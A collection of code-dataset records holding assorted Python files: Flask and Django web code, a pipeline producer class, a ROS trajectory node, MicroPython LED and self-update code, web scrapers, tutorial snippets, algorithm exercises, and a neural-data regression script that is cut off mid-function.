with c.session_transaction() as sess:\n                sess[CURR_USER_KEY] = 87654\n\n            resp = c.post(\"/messages/5454/delete\", follow_redirects=True)\n            html = resp.get_data(as_text=True)\n\n            self.assertEqual(resp.status_code, 200)\n            self.assertIn(\"Access unauthorized.\", html)","sub_path":"WarblerApp-main/test_message_views.py","file_name":"test_message_views.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"47682186","text":"from stepist.flow import session\nfrom stepist.flow.steps.next_step import call_next_step\n\nfrom stairs.core.session import producer_session\nfrom stairs.core.app import components\nfrom stairs.core.producer.utils import producer_retry, custom_callbacks_to_dict\n\n\nclass Producer(components.AppProducer):\n    \"\"\"\n    Producer app component: wraps a generator handler and forwards the jobs\n    it yields to the configured callbacks (pipelines).\n    \"\"\"\n    DEFAULT_QUEUE_LIMIT = 10 ** 6\n\n    def __init__(self, app, handler, default_callbacks: list,\n                 custom_callbacks: list, queue_limit=None,\n                 single_transaction=False):\n\n        self.app = app\n\n        self.queue_limit = queue_limit or self.DEFAULT_QUEUE_LIMIT\n        self.single_transaction = single_transaction\n\n        # The main generator which yields data\n        self.handler = handler\n\n        # Callbacks which should always be run\n        self.default_callbacks = default_callbacks or []\n        # Callbacks which should be run based on user console input\n        self.custom_callbacks = custom_callbacks_to_dict(custom_callbacks or [])\n\n        # Stepist step used to forward jobs to the current producer,\n        # e.g. from a Batch Producer\n        self.stepist_step = self.app\\\n            .project\\\n            .stepist_app\\\n            .step(None,\n                  as_worker=True,\n                  unique_id=self.get_producer_id())(self.run_jobs)\n\n        components.AppProducer.__init__(self, app)\n\n    def __call__(self, *args, **kwargs):\n        self.run(user_args=args, user_kwargs=kwargs)\n\n    def run(self, custom_callbacks_keys: list = None,\n            single_transaction: bool = False, user_args=None, user_kwargs=None):\n        \"\"\"\n        Execute the producer from the console with the specified args and\n        kwargs. Custom callbacks can also be specified here.\n        \"\"\"\n        custom_callbacks = []\n\n        # Basic check for custom callbacks\n        for custom_callback in custom_callbacks_keys or []:\n            callback = self.custom_callbacks.get(custom_callback, None)\n            if callback is None:\n                print(\"Producer callback `%s` (another producer or pipeline\"\n                      \") not found.\" % custom_callback)\n                exit()\n            custom_callbacks.append(callback)\n\n        # Basic check for callbacks\n        if not custom_callbacks and not self.default_callbacks:\n            print(\"No callbacks were found; specify a default callback or use \"\n                  \"a custom callback\")\n            exit()\n\n        callbacks_to_run = custom_callbacks + self.default_callbacks\n\n        single_transaction = single_transaction or self.single_transaction\n        user_args = user_args or []\n        user_kwargs = user_kwargs or dict()\n\n        # Running jobs from producer\n        if not single_transaction:\n            for job in self.handler(*user_args, **user_kwargs):\n                self.send_job(job, callbacks_to_run)\n        else:\n            jobs_to_send = list(self.handler(*user_args, **user_kwargs))\n            self.send_jobs(jobs_to_send, callbacks_to_run)\n\n    def run_jobs(self, **kwargs):\n        \"\"\"\n        Stepist Handler for executing forwarded jobs.\n\n        Important(!) 
If you want to use custom callbacks, set them using:\n        `producer_session.change_custom_callbacks` contextmanager\n        \"\"\"\n        custom_callbacks = producer_session.get_custom_callbacks()\n        self.run(custom_callbacks_keys=custom_callbacks,\n                 user_kwargs=kwargs,\n                 single_transaction=True)\n\n    def send_job(self, job, callbacks_to_run):\n        with session.change_flow_ctx({}, {}):\n\n            # TODO: Make this safer; it would be good to run all callbacks\n            # in one transaction, otherwise a callback may fail and data\n            # may be duplicated or lost\n            for callback in callbacks_to_run:\n                self._job_to_stepist(job, callback.step)\n\n    def send_jobs(self, jobs, callbacks_to_run):\n        with session.change_flow_ctx({}, {}):\n\n            # TODO: Make this safer; it would be good to run all callbacks\n            # in one transaction, otherwise a callback may fail and data\n            # may be duplicated or lost\n            for callback in callbacks_to_run:\n                self._job_to_stepist(jobs, callback.step, batch_data=True)\n\n    @producer_retry(5, Exception)\n    def _job_to_stepist(self, stepist_job, step, **kwargs):\n        call_next_step(stepist_job, step, **kwargs)\n\n    def get_producer_id(self):\n        return \"producer:%s:%s\" % (self.app.app_name, self.handler.__name__)\n\n    def get_handler_name(self):\n        return self.handler.__name__\n\n    def get_stepist_step(self):\n        return self.stepist_step\n\n    def flush(self):\n        for pipeline in self.default_callbacks:\n            pipeline.step.flush_all()\n\n        for pipeline in self.custom_callbacks.values():\n            pipeline.step.flush_all()\n\n    def key(self):\n        return self.get_handler_name()\n\n\ndef run_jobs_processor(project, producers_to_run, custom_callbacks_keys: list = None,\n                       die_when_empty=False):\n    \"\"\"\n    Execute forwarded jobs (from a batch producer).\n    \"\"\"\n    steps_to_run = [p.stepist_step for p in producers_to_run]\n    with producer_session.change_custom_callbacks(custom_callbacks_keys):\n        project \\\n            .stepist_app\\\n            .run(steps_to_run,\n                 die_on_error=True,\n                 die_when_empty=die_when_empty)","sub_path":"stairs/core/producer/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"112519091","text":"from ALPSCommon import *\r\nfrom ALPSModule import ALPSPlugin\r\n\r\ndef plugin_initialize():\r\n    socket_thread = ALPSThread(threadfunc=app1_thread, threadname='app1_socket_client_thread')\r\n    socket_thread.start()\r\n    return True # should not be omitted\r\n\r\ndef process_apple(message_packet):\r\n    m = Message('MESSAGE_REPLY', 'Thank you for your apple! Now I have some apples.')\r\n    ALPSDebug.alps_print(ALPSDebug.LEVEL.INFO, __name__, \"Submitted Message:\", m.name, m.length, m.body)\r\n    api_submit_message(m)\r\n    m = Message('MESSAGE_EAT', \"let's eat apples\")\r\n    ALPSDebug.alps_print(ALPSDebug.LEVEL.INFO, __name__, \"Submitted Message:\", m.name, m.length, m.body)\r\n    api_submit_message(m)\r\n\r\ndef process_thanks(message_packet):\r\n    pass\r\n\r\ndef app1_thread():\r\n    host = \"127.0.0.1\"\r\n    port = 8001\r\n\r\n    while True:\r\n        time.sleep(10)\r\n        try:\r\n            ALPSDebug.alps_print('=' * 80)\r\n            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n            s.connect((host, port))\r\n            s.send(\"Hello, Server! I'm app1. 
I wanna some apples, who can give me?\")\r\n            ALPSDebug.alps_print('Server says:', s.recv(1024))\r\n        except Exception as e:\r\n            ALPSDebug.alps_error('s.connect error:', e)\r\n            break\r\n\r\nmessage_process_map = {'MESSAGE_APPLE': process_apple,\r\n                       'MESSAGE_THANKS': process_thanks,\r\n                       'MESSAGE_OTHER': None}\r\n\r\nALPSPlugin(message_process_map=message_process_map,\r\n           initial_func=plugin_initialize)\r\n","sub_path":"WLAN Software Development Test Tool/WSDT/__Template.py","file_name":"__Template.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"112604986","text":"'''Rotates a given matrix in place by 90 degrees.'''\n\ndef rotate(matrix):\n    if not matrix:\n        return\n    for i in range(int(len(matrix)/2)):\n        offset = len(matrix) - (i + 1)\n        top = i\n        increasing = top\n        decreasing = offset\n        bottom = decreasing\n        cycles = offset\n        if cycles == 2:\n            cycles -= 1 # If the matrix is 2x2, only do one cycle.\n        for _ in range(cycles):\n            TL = matrix[top][increasing]\n            TR = matrix[increasing][bottom]\n            BR = matrix[bottom][decreasing]\n            BL = matrix[decreasing][top]\n            matrix[top][increasing], matrix[increasing][bottom], matrix[bottom][decreasing], \\\n            matrix[decreasing][top] = TR, BR, BL, TL\n            increasing += 1\n            decreasing -= 1\n\n    return matrix\n","sub_path":"arrays_strings/RotateMatrix/rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"6142722","text":"import machine\nimport time\n\nled = machine.Pin(21, machine.Pin.OUT)\n\nfor i in range(9):\n    led.value(1)\n    time.sleep_ms(500)\n    led.value(0)\n    time.sleep_ms(500)\n\nf = open('green/main.py')\nupdated_code = f.read()\nf.close()\n\nf = open('main.py', \"w\")\nf.write(updated_code)\nf.close()\nmachine.reset()\n","sub_path":"red/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"234095451","text":"from typing import List\n\nimport numpy\n\n\ndef main():\n    print(\"hello world\")\n\n\nif __name__ == \"__main__\":\n    main()\n\nmyLst: List[int] = [1, 2, 3, 5, 7, 9]\n\nprint(myLst)\n\nfor counter in myLst:\n    print(counter)\n\n# create a list\nmylist = [\"richie\", 1.84, \"inge\", 1.65, \"alex\", 1.67]\n# change one item from a list\nmylist[5] = 1.68\n# change multiple items\nmylist[0:2] = [\"richard\", 1.86]\n# remove item from list\ndel mylist[2]\n# concatenation returns a new list; mylist itself is unchanged\nmylist + [\"kasper\", 0.71]\n# create new list and add item\nmylist_ext = mylist + [\"castor\", 1.44, \"pollux\", 1.54]\n\n# create a set\nprimesS = set((1, 2, 3, 5, 7))\n# create a tuple\nprimesT = (1, 2, 3, 5, 7)\n# create a list\nprimesL = [1, 2, 3, 5, 7]\n\n# create a range\nr = range(1, 5)\n# test if value in range\n1 in r\n\n# Web Scraping\nmain_url = \"https://www.humblebundle.com/\"\n\nimport requests\nresult = requests.get(main_url)\n\nresult.text[:1000]\n\n\nfrom bs4 import BeautifulSoup\nsoup = BeautifulSoup(result.text, 'html.parser')\n\nprint(soup.prettify()[:1000])\n\n# Collections ##############\nimport collections as col\n\nabc = 'jiwamotqgcfnudclzbyxkzmrvp'\nmycount = col.Counter(abc)\nprint(2 in mycount.values())\n\n# elements() returns an iterator over the counted elements\nmycount.elements()\n# show elements of collection\nlist(mycount.elements())\n# show number of elements\nlen(list(mycount.elements()))\n\n\n############ Python OOP #######################\n############ 
Create a class ###########\n'''\nclass Employee:\n\n    def __init__(self, first, last, pay):\n        self.first = first\n        self.last = last\n        self.pay = pay\n        self.email = first + '.' + last + '@company.com'\n\n\nemp_1 = Employee('Corey', 'Schafer', 50000)\nemp_2 = Employee('Test', 'User', 40000)\n\n# to print full name we can do:\nprint('{} {}'.format(emp_1.first, emp_1.last))\n\n# or we create a method:\n'''\n\n\nclass Employee:\n\n    num_of_emps = 0\n    raise_amount = 1.04\n\n    def __init__(self, first, last, pay):\n        self.first = first\n        self.last = last\n        self.pay = pay\n        self.email = first + '.' + last + '@company.com'\n\n        Employee.num_of_emps += 1\n\n\n    def fullname(self):\n        return '{} {}'.format(self.first, self.last)\n\n    def apply_raise(self):\n        self.pay = int(self.pay * self.raise_amount)\n\n\nemp_1 = Employee('Corey', 'Schafer', 50000)\nemp_2 = Employee('Test', 'User', 40000)\nprint(emp_1.fullname())\nprint(emp_2.email)\nprint(Employee.fullname(emp_1))\n\nprint(emp_1.pay)\nemp_1.apply_raise()\nprint(emp_1.pay)\nprint(Employee.raise_amount)\nprint(emp_1.raise_amount)\nprint(emp_1.__dict__)\nprint(Employee.__dict__)\n\nprint(Employee.num_of_emps)\n\n\n\n\n","sub_path":"scratch/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"212833764","text":"import logging\nstdlogger = logging.getLogger(__name__)\n\nclass CoffeehouseMiddleware(object):\n\n    def __init__(self, get_response):\n        stdlogger.info(\"Start CoffeehouseMiddleware __init__\")\n        self.get_response = get_response\n        stdlogger.info(\"End CoffeehouseMiddleware __init__\")\n    \n    def __call__(self, request):\n        stdlogger.info(\"Start CoffeehouseMiddleware __call__\")\n\n        stdlogger.info(\"CoffeehouseMiddleware __call__ before get_response\")\n        response = self.get_response(request)\n        stdlogger.info(\"CoffeehouseMiddleware __call__ after get_response\")\n        \n        stdlogger.info(\"End CoffeehouseMiddleware __call__\")\n        return response\n\n    def process_view(self, request, view_func, view_args, view_kwargs):\n        \"\"\" Called on each request, just before Django calls the view.\n        Keyword arguments:\n        request -- the HttpRequest object. \n        view_func -- the Python function that Django is about to use. It's the actual function object, not the name of the function as a string.\n        view_args -- a list of positional arguments that will be passed to the view. Does not include the first view argument (request).\n        view_kwargs -- a dictionary of keyword arguments that will be passed to the view. Does not include the first view argument (request).\n        Response value: \n        None -- An empty value; If it returns None, Django will continue processing this request, executing any other process_view() middleware and, then, the appropriate view. \n        HttpResponse -- An HttpResponse object; If it returns an HttpResponse object, Django won't bother calling any other view or exception middleware, or the appropriate view; it'll apply response middleware to that HttpResponse, and return the result.\n        NOTE: Request-phase method applied in order, from the top to bottom. This means classes defined at the start of MIDDLEWARE will be run first.\n        \"\"\"\n        stdlogger.info(\"Start CoffeehouseMiddleware process_view\")\n        stdlogger.info(\"End CoffeehouseMiddleware process_view\")\n        return None\n\n    def process_exception(self, request, exception):\n        \"\"\" Called when a view raises an exception.\n        Keyword arguments:\n        request -- the HttpRequest object. 
\n        exception -- an Exception object raised by the view function.\n        Response value: \n        None -- An empty value; the default exception handling kicks in.\n        HttpResponse -- An HttpResponse object; If it returns an HttpResponse object, the template response and \n        response middleware will be applied, and the resulting response returned to the browser. If an exception \n        middleware returns a response, the middleware classes above that middleware will not be called at all.\n        NOTE: Response-phase method applied in reverse order, from the bottom up. This means classes defined at \n        the end of MIDDLEWARE will be run first.\n        \"\"\"\n        stdlogger.info(\"Start CoffeehouseMiddleware process_exception\")\n        stdlogger.info(\"End CoffeehouseMiddleware process_exception\")\n        return None\n\n    def process_template_response(self, request, response):\n        \"\"\" Called just after the view has finished executing.\n        Keyword arguments:\n        request -- the HttpRequest object. \n        response -- the TemplateResponse object (or equivalent) returned by a Django view or by a middleware.\n        Response value: \n        TemplateResponse or equivalent response object that implements a render method. It could alter the given \n        response by changing response.template_name and response.context_data, or it could create and return a \n        brand-new TemplateResponse or equivalent.\n        NOTE: You don't need to explicitly render responses, responses are automatically rendered once all \n        template response middleware has been called.\n        NOTE2: Response-phase method applied in reverse order, from the bottom up. This means classes defined at \n        the end of MIDDLEWARE will be run first.\n        \"\"\"\n        stdlogger.info(\"Start CoffeehouseMiddleware process_template_response\")\n        stdlogger.info(\"End CoffeehouseMiddleware process_template_response\")\n        return response\n","sub_path":"coffeehouse/utils/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"396537868","text":"from typing import List\nimport math\n\n\nclass Solution:\n    def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:\n        # pair each point's distance from the origin with its index\n        dist = []\n        for index, point in enumerate(points):\n            dist.append([math.sqrt(point[0]**2 + point[1]**2), index])\n\n        dist.sort(key=lambda x: x[0])\n\n        ans = []\n        for i in range(k):\n            ans.append(points[dist[i][1]])\n\n        return ans","sub_path":"day-30-k-closest-point-to-origin.py","file_name":"day-30-k-closest-point-to-origin.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"280297077","text":"#!/usr/bin/env python\nimport rospy\nimport time\n\nimport feedbot_trajectory_logic.tracker_interface as tracker\nimport numpy as np\nfrom learn_trajectory.srv import PlayTrajectory\nfrom std_msgs.msg import String, Empty\nfrom geometry_msgs.msg import Quaternion\n\n\nclass SpoonFeeder:\n  def __init__(self):\n    rospy.logwarn(\"sleeping for 5 seconds before starting recorded motion\")\n    rospy.sleep(5)\n    # quaternion is defined in order x,y,z,w\n    self.defaultQuat = Quaternion(0.5, 0.5, 0.5, 0.5)\n    self.tracker = tracker.TrackerInterface(self.defaultQuat)\n    self.trackertoo = tracker.TrackerInterface(self.defaultQuat, '/domusromus/update_pose_target')\n    self.play_trajectory_topic = \"trained_poses\"\n    self._play_trajectory = rospy.ServiceProxy(\"play_trajectory\", PlayTrajectory)\n\n  def follow_trajectory(self, recording_file_name):\n    
self.tracker.start_updating_target_to_pose(self.play_trajectory_topic, [0,0,0])\n    self.trackertoo.start_updating_target_to_pose(\"/domusromus/\"+self.play_trajectory_topic,[0,0,0])\n    rospy.logwarn(\"Playing trajectory at \" + self.play_trajectory_topic)\n    self._play_trajectory(String(self.play_trajectory_topic), String(recording_file_name))\n\nif __name__==\"__main__\":\n  rospy.init_node('spoon_feeder', anonymous=True)\n  recording_file_name = rospy.get_param(\"~recording_file_name\")\n  s = SpoonFeeder()\n  while True:\n    s.follow_trajectory(recording_file_name)\n    time.sleep(5)\n","sub_path":"scripts/execute_both_trajectory_node.py","file_name":"execute_both_trajectory_node.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"58767373","text":"# -*- coding: utf-8 -*-\n\"\"\"\nspecially for 58\nAuthor: jianyu\nEmail: 544194390@qq.com\nDate: 2016/03/29\n\"\"\"\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport re\nimport setting\n\n\ndef get_pos_list(content):\n    \"\"\"\n    collect the <a> tags and fetch the 'posCont' block from each linked page\n    :param content: HTML of a 58.com list page, e.g. fetched from \"http://gz.58.com/tech/\"\n    :return: a list of raw posCont details, not yet parsed\n    \"\"\"\n    soup = BeautifulSoup(content, \"html5lib\")\n    a_list = soup.find_all(\"a\", class_=\"t\", limit=setting.position_count)\n    pos_list = []\n    for a in a_list:\n        # the links redirect, so fetch each one with urllib\n        content = urllib.request.urlopen(a['href']).read()\n        soup = BeautifulSoup(content, \"html5lib\")\n        position_msg = soup.find_all(class_=\"posCont\", limit=1)\n        pos_list.append(position_msg)\n    return pos_list\n\n\ndef space_filter(str):\n    \"\"\"\n    remove all newline and space characters\n    \"\"\"\n    return str.replace('\n', '').replace(' ', '').replace('
', ' ')\n\n\ndef tag_filter(str):\n \"\"\"\n remove all the html tag\n \"\"\"\n return re.sub('<[^>]+>', '', str)\n\n\ndef handle_content(content):\n \"\"\"\n Specifically for fetching things from a website about works\n being used in FUNCTION handle_request\n :param content: a string of html\n :return: nothing but print to screen\n\n \"http://gz.58.com/tech/\"\n \"\"\"\n\n position_list = get_pos_list(content)\n # position_list_end is the result and it will be printed out\n position_list_end = []\n position = dict()\n\n for each_position in position_list:\n position.clear()\n if len(each_position) == 0:\n return\n else:\n each_position = each_position[0]\n\n position['position_name'] = each_position.h1.string\n position['update_time'] = each_position.ul.li.span.strong.string\n soup = BeautifulSoup(str(each_position), \"html5lib\")\n position['next_url'] = soup.find_all(id=\"nextUrl\", limit=1)[0]['href']\n\n company = soup.find_all(class_=\"companyName\", limit=1)[0]\n position['company_name'] = space_filter(company.string)\n position['company_url'] = company['href']\n\n company_msg = soup.find_all(class_=\"compMsg\", limit=1)[0]\n position['company_msg'] = space_filter(company_msg.ul.li.a.string)\n\n scale = soup.find_all(class_=\"scale\", limit=1)[0]\n soup_4_scale = BeautifulSoup(str(scale), \"html5lib\")\n position['company_scale'] = str(soup_4_scale.li).\\\n replace(\"规模: \", '').\\\n replace('
  • ', '').\\\n replace('
  • ', '')\n position['company_scale'] = space_filter(position['company_scale'])\n\n pos_info_list_1 = soup.find_all(class_=\"w380\", limit=2)\n position['salary'] = pos_info_list_1[0].strong.string\n position['position_type'] = str(pos_info_list_1[1]).\\\n replace(\"招聘职位:\", '').\\\n replace('
    ', '').\\\n replace('
    ', '')\n position['position_type'] = space_filter(position['position_type'])\n\n pos_info_list_2 = soup.find_all(class_=\"fl\", limit=2)\n position['study_require'] = str(pos_info_list_2[0]).\\\n replace(\"学历要求:\", '').\\\n replace('
    ', '').\\\n replace('
    ', '')\n position['work_time'] = str(pos_info_list_2[1]).\\\n replace(\"工作年限:\", '').\\\n replace('
    ', '').\\\n replace('
    ', '')\n position['study_require'] = space_filter(position['study_require'])\n position['work_time'] = space_filter(position['work_time'])\n\n area = soup.find_all(class_=\"condition\", limit=3)\n soup_4_area = BeautifulSoup(str(area), \"html5lib\").find_all('span')\n position['work_area'] = soup_4_area[6].string\n\n pos_info_list_4 = soup.find_all(class_=\"cbSum\", limit=4)\n position['bonus'] = \"\"\n for info in pos_info_list_4:\n position['bonus'] = position['bonus'] + info.span.string + \" \"\n\n detail = soup.find_all(class_=\"borb\", limit=1)\n soup_4_detail = BeautifulSoup(str(detail[0]), \"html5lib\")\n position['detail'] = ''\n for span in soup_4_detail.find_all(\"span\"):\n position['detail'] = position['detail'] + tag_filter(str(span)) + \" \"\n position['detail'] = space_filter(position['detail'])\n\n company_introduction = soup.find_all(class_=\"compIntro\", limit=1)\n soup_4_intro = BeautifulSoup(str(company_introduction), \"html5lib\")\n position['company_introduction'] = ''\n for span in soup_4_intro.find_all(['p', 'span']):\n position['company_introduction'] = position['company_introduction'] + tag_filter(str(span)) + ' '\n position['company_introduction'] = space_filter(position['company_introduction'])\n\n for each in position:\n position[each] = tag_filter(position[each]).encode('utf-8').decode('utf-8')\n position_list_end.append(position)\n\n print(position_list_end)\n","sub_path":"contentHelper/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":5113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"85252578","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 9 12:22:26 2019\n\n@author: veronikasamborska\n\"\"\"\nimport sys\n\nsys.path.append('/Users/veronikasamborska/Desktop/ephys_beh_analysis/remapping')\nsys.path.append('/Users/veronikasamborska/Desktop/ephys_beh_analysis/preprocessing')\n\nimport remapping_count as rc \nimport numpy as np\nimport matplotlib.pyplot as plt\nimport regression_function as reg_f\nimport regressions as re\nfrom collections import OrderedDict\nfrom matplotlib import colors as mcolors\nfrom sklearn.linear_model import LinearRegression\n\n\n# ols = LinearRegression(copy_X = True,fit_intercept = False)\n# ols.fit(X_1,y_1)\n# sse = np.sum((ols.predict(X_2) - y_2)**2, axis = 0)\n# cpd = np.zeros([y.shape[1],X_2.shape[1]])\n\n# for i in range(X_1.shape[1]):\n# X_i = np.delete(X_1,i,axis=1)\n# X_i_1 = np.delete(X_2,i,axis=1)\n# ols.fit(X_i,y_1)\n# sse_X_i = np.sum((ols.predict(X_i_1) - y_2)**2, axis=0)\n# cpd[:,i]=(sse_X_i-sse)/sse_X_i\n \n# cpd = cpd.reshape(12,n_timepoints, n_predictors) \n# sse = sse.reshape(12,n_timepoints)\n# plt.figure()\n# for i in range(12):\n# plt.plot(sse[i,:])\n \n# c = np.mean(cpd, 0)\n# for i in range(cpd.shape[2]):\n# plt.plot(c[:,i])\n\ndef _CPD_cross_task(X,X1, y, y1):\n \n 'Evaluate coefficient of partial determination for each predictor in X'\n ols = LinearRegression(copy_X = True,fit_intercept = False)\n ols.fit(X1,y1)\n sse = np.sum((ols.predict(X1) - y1)**2, axis = 0)\n cpd = np.zeros([y.shape[1],X.shape[1]])\n \n for i in range(X.shape[1]):\n X_i = np.delete(X,i,axis=1)\n X_i_1 = np.delete(X1,i,axis=1)\n ols.fit(X_i,y)\n sse_X_i = np.sum((ols.predict(X_i_1) - y1)**2, axis=0)\n cpd[:,i]=(sse_X_i-sse)/sse_X_i\n \n return cpd\n\n\ndef regression_general(data):\n \n C = []\n cpd = []\n \n C_1 = []\n C_2 = []\n C_3 = []\n \n cpd_1_2 = []\n cpd_2_3 = []\n\n dm = data['DM']\n #dm = dm[:-1]\n firing = 
data['Data']\n #firing = firing[:-1]\n \n for s, sess in enumerate(dm):\n DM = dm[s]\n firing_rates = firing[s]\n n_trials, n_neurons, n_timepoints = firing_rates.shape\n \n if n_neurons > 10:\n session_trials_since_block = []\n\n \n state = DM[:,0]\n choices = DM[:,1]\n reward = DM[:,2]\n b_pokes = DM[:,7]\n a_pokes = DM[:,6]\n task = DM[:,5]\n block = DM[:,4]\n block_df = np.diff(block)\n taskid = rc.task_ind(task,a_pokes,b_pokes)\n \n correct_choice = np.where(choices == state)[0]\n correct = np.zeros(len(choices))\n correct[correct_choice] = 1\n \n a_since_block = []\n trials_since_block = []\n t = 0\n \n #Bug in the state? \n for st,s in enumerate(block):\n if state[st-1] != state[st]:\n t = 0\n else:\n t+=1\n trials_since_block.append(t)\n \n session_trials_since_block.append(trials_since_block)\n \n t = 0 \n for st,(s,c) in enumerate(zip(block, choices)):\n if state[st-1] != state[st]:\n t = 0\n a_since_block.append(t)\n \n elif c == 1:\n t+=1\n a_since_block.append(t)\n else:\n a_since_block.append(0)\n \n negative_reward_count = []\n rew = 0\n block_df = np.append(block_df,0)\n for r,b in zip(reward,block_df):\n \n if r == 0:\n rew += 1\n negative_reward_count.append(rew)\n elif r == 1:\n rew -= 1\n negative_reward_count.append(rew)\n if b != 0:\n rew = 0\n \n positive_reward_count = []\n rew = 0\n block_df = np.append(block_df,0)\n for r,b in zip(reward,block_df):\n \n if r == 1:\n rew += 1\n positive_reward_count.append(rew)\n elif r == 0:\n rew += 0\n positive_reward_count.append(rew)\n if b != 0:\n rew = 0\n \n positive_reward_count = np.asarray(positive_reward_count)\n negative_reward_count = np.asarray(negative_reward_count)\n choices_int = np.ones(len(reward))\n \n \n choices_int[np.where(choices == 0)] = -1\n reward_choice_int = choices_int * reward\n interaction_trial_latent = trials_since_block * state\n interaction_a_latent = a_since_block * state\n int_a_reward = a_since_block * reward\n \n interaction_trial_choice = trials_since_block*choices_int\n reward_trial_in_block = trials_since_block*positive_reward_count\n negative_reward_count_st = negative_reward_count*correct\n positive_reward_count_st = positive_reward_count*correct\n negative_reward_count_ch = negative_reward_count*choices\n positive_reward_count_ch = positive_reward_count*choices\n ones = np.ones(len(choices))\n \n \n predictors_all = OrderedDict([('Reward', reward),\n ('Choice', choices),\n #('Correct', correct),\n #('A in Block', a_since_block), \n #('A in Block x Reward', int_a_reward), \n \n ('State', state),\n ('Trial in Block', trials_since_block),\n #('Interaction State x Trial in Block', interaction_trial_latent),\n #('Interaction State x A count', interaction_a_latent),\n \n ('Choice x Trials in Block', interaction_trial_choice),\n ('Reward x Choice', reward_choice_int),\n # ('No Reward Count in a Block', negative_reward_count),\n # ('No Reward x Correct', negative_reward_count_st),\n # ('Reward Count in a Block', positive_reward_count),\n # ('Reward Count x Correct', positive_reward_count_st),\n # ('No reward Count x Choice',negative_reward_count_ch),\n # ('Reward Count x Choice',positive_reward_count_ch),\n # ('Reward x Trial in Block',reward_trial_in_block),\n \n ('ones', ones)])\n \n \n X = np.vstack(predictors_all.values()).T[:len(choices),:].astype(float)\n n_predictors = X.shape[1]\n y = firing_rates.reshape([len(firing_rates),-1]) # Activity matrix [n_trials, n_neurons*n_timepoints]\n tstats = reg_f.regression_code(y, X)\n \n C.append(tstats.reshape(n_predictors,n_neurons,n_timepoints)) 
# Predictor loadings\n cpd.append(re._CPD(X,y).reshape(n_neurons,n_timepoints, n_predictors))\n \n task_1 = np.where(taskid == 1)[0]\n task_2 = np.where(taskid == 2)[0]\n task_3 = np.where(taskid == 3)[0]\n \n # Task 1 \n reward_t1 = reward[task_1]\n choices_t1 = choices[task_1]\n correct_t1 = correct[task_1]\n \n a_since_block_t1 = np.asarray(a_since_block)[task_1]\n int_a_reward_t1 = int_a_reward[task_1]\n state_t1 = state[task_1]\n trials_since_block_t1 = np.asarray(trials_since_block)[task_1]\n interaction_trial_latent_t1 = interaction_trial_latent[task_1]\n interaction_a_latent_t1 = interaction_a_latent[task_1]\n interaction_trial_choice_t1 = interaction_trial_choice[task_1]\n reward_choice_int_t1 = reward_choice_int[task_1]\n negative_reward_count_t1 = negative_reward_count[task_1]\n negative_reward_count_st_t1 = negative_reward_count_st[task_1]\n positive_reward_count_t1 = positive_reward_count[task_1]\n positive_reward_count_st_t1 = positive_reward_count_st[task_1]\n negative_reward_count_ch_t1 = negative_reward_count_ch[task_1]\n positive_reward_count_ch_t1 = positive_reward_count_ch[task_1]\n reward_trial_in_block_t1 = reward_trial_in_block[task_1]\n \n firing_rates_t1 = firing_rates[task_1]\n ones = np.ones(len(choices_t1))\n \n predictors = OrderedDict([('Reward', reward_t1),\n ('Choice', choices_t1),\n ('Correct', correct_t1),\n ('A in Block', a_since_block_t1), \n ('A in Block x Reward', int_a_reward_t1), \n \n ('State', state_t1),\n ('Trial in Block', trials_since_block_t1),\n ('Interaction State x Trial in Block', interaction_trial_latent_t1),\n ('Interaction State x A count', interaction_a_latent_t1),\n \n ('Choice x Trials in Block', interaction_trial_choice_t1),\n ('Reward x Choice', reward_choice_int_t1),\n ('No Reward Count in a Block', negative_reward_count_t1),\n ('No Reward x Correct', negative_reward_count_st_t1),\n ('Reward Count in a Block', positive_reward_count_t1),\n ('Reward Count x Correct', positive_reward_count_st_t1),\n ('No reward Count x Choice',negative_reward_count_ch_t1),\n ('Reward Count x Choice',positive_reward_count_ch_t1),\n ('Reward x Trial in Block',reward_trial_in_block_t1),\n \n ('ones', ones)])\n \n X_1 = np.vstack(predictors.values()).T[:len(choices_t1),:].astype(float)\n n_predictors = X_1.shape[1]\n y_1 = firing_rates_t1.reshape([len(firing_rates_t1),-1]) # Activity matrix [n_trials, n_neurons*n_timepoints]\n tstats = reg_f.regression_code(y_1, X_1)\n \n C_1.append(tstats.reshape(n_predictors,n_neurons,n_timepoints)) # Predictor loadings\n \n \n \n # Task 2\n reward_t2 = reward[task_2]\n choices_t2 = choices[task_2]\n correct_t2 = correct[task_2]\n \n a_since_block_t2 = np.asarray(a_since_block)[task_2]\n int_a_reward_t2 = int_a_reward[task_2]\n state_t2 = state[task_2]\n trials_since_block_t2 = np.asarray(trials_since_block)[task_2]\n interaction_trial_latent_t2 = interaction_trial_latent[task_2]\n interaction_a_latent_t2 = interaction_a_latent[task_2]\n interaction_trial_choice_t2 = interaction_trial_choice[task_2]\n reward_choice_int_t2 = reward_choice_int[task_2]\n negative_reward_count_t2 = 